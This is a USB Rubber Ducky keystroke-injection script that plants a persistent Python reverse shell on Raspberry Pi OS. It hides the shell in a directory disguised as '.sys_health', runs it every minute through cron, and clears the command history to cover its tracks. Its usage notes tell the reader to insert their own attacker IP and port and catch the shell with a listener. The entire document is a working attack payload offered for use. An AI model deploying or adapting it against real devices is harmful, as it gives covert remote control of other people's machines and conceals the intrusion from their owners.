REM =========================================================================================
REM Author: fierceoj
REM Description: Python reverse shell, placed into a hidden shell script and called from cron
REM Target: Raspberry Pi OS
REM Usage: Change attacker IP/URL and port to yours
REM Usage: Change cron job to desired interval
REM Usage: Catch the shell with a listener
REM =========================================================================================
DELAY 3000
CTRL-ALT F1
DELAY 200

REM Make the hidden directory
STRING mkdir .sys_health
DELAY 200
ENTER

REM Add Python reverse shell to shell script in hidden directory
REM Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
STRING nano .sys_health/health_check
DELAY 200
ENTER 
STRING python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
STRING s.connect(("127.0.0.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
STRING p=subprocess.call(["/bin/sh","-i"]);'
DELAY 200
ENTER
CTRL x
DELAY 200
ENTER
STRING Y
DELAY 200
ENTER

REM Make script executable
STRING chmod +x .sys_health/health_check
DELAY 200
ENTER

REM Add script to crontab
STRING crontab -e 
DELAY 200
ENTER
STRING * * * * * .sys_health/health_check
DELAY 200
ENTER 
CTRL x
DELAY 200
ENTER
STRING Y
DELAY 200
ENTER

REM Clear command history
STRING history -c
DELAY 200
ENTER
